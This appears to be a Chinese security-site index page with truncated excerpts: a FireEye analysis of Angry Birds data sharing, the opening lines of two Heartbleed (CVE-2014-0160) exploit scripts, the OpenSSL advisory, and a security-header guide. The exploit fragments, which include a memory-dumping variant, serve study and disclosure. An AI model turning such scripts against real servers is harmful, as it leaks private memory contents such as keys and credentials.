Angry Birds和广告系统泄露个人信息——FireEye对Angry Birds的分析

from:http://www.fireeye.com/blog/technical/mobile-threats/2014/03/a-little-bird-told-me-personal-information-sharing-in-angry-birds-and-its-ad-libraries.html 0x00 背景 很多流行的app,包括愤怒的小鸟在内,收集并且分享玩家的个人信息的广泛程度,远远超过大多数人所了解的。 一些媒体只是进行了表面的报道,

openssl 多线程 多域名 EXP,支持自定义端口,保存二进制文件,节省空间

#!/usr/bin/python # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org) # The author disclaims copyright to this source code. # Multi process and bin dump version by anthrax@insight-labs.org import sys import struct import socket import time import select import re from multiprocessing import Process,Lock,Manager THREADS = 5 lock = Lock() def h2bin(x): return x.replace(' ', '').replace('\n', '').decode('hex') hello = h2bin(''' 16 03 02 00 dc 01 00 00

openssl 漏洞利用程序,支持smtp, pop3, imap, ftp, or xmpp的POC

#!/usr/bin/python # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org) # Modified by Derek Callaway (decal@ethernet.org) to add STARTTLS protocols # The authors disclaim copyright to this source code. import sys import struct import socket import time import select import re from optparse import OptionParser options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)') options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)') options.add_option('-s', '--starttls',

OpenSSL 漏洞利用程序脚本 POC,OpenSSL“heartbleed”重大安全漏洞!

OpenSSL Security Advisory [07 Apr 2014] ======================================== TLS heartbeat read overrun (CVE-2014-0160) ========================================== A missing bounds check in the handling of the TLS heartbeat extension can be used to reveal up to 64k of memory to a connected client or server. Only 1.0.1 and 1.0.2-beta releases of OpenSSL are affected including 1.0.1f and 1.0.2-beta1. Thanks for Neel Mehta of Google Security for discovering this bug and to Adam Langley <agl@chromium.org>

header的安全配置指南

from:https://blog.veracode.com/2014/03/guidelines-for-setting-security-headers/ 0x00 背景 在统计了Alexa top 100万网站的header安全分析之后(2012年11月 - 2013年3月 - 2013年11月),我们发现其实如何正